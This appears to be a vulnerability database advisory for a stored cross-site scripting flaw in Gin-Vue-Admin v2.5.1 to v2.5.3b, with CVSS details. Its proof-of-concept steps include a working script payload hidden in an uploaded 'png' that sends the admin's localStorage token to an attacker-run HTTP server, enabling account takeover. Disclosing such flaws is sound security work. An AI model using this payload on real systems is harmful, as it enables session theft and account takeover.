Mend Vulnerability Database
What is a CVE vulnerability ID? What is a WS vulnerability ID?New vulnerability? Tell us about it!
We found results for “”
Date: October 17, 2022
PoC Details1. Access the application from a web browser and log in as an admin user.
2. Open a private window and log in as a regular (Low privileges) user.
3. Go to the personal information, click on the profile image, and then click on the 'Normal Upload' button.
4. Create a .png file with the code in the PoC code section below.
5. Create a HTTP server using python (python3 -m http.server 3333)
6. Select the takeover2.png and intercept the request.
7. Change the name of takeover2.png to takeover2.html and forward the request.
8. Go to the Media Library (Upload and Download) from the admin account and open the takeover.html ('Open image in New Tab'). This will trigger the XSS payload from takeover.html and send the admin cookie to the attacker's server, leading to account takeover.
takeover2.png file: <script> var i=new Image; i.src="http://127.0.0.1:3333/?"+localStorage.getItem('token'); </script>
Affected EnvironmentsGin-Vue-Admin versions v2.5.1 through v2.5.3b
Good to know:
No fix version available
|Attack Vector (AV):||Network|
|Attack Complexity (AC):||Low|
|Privileges Required (PR):||Low|
|User Interaction (UI):||Required|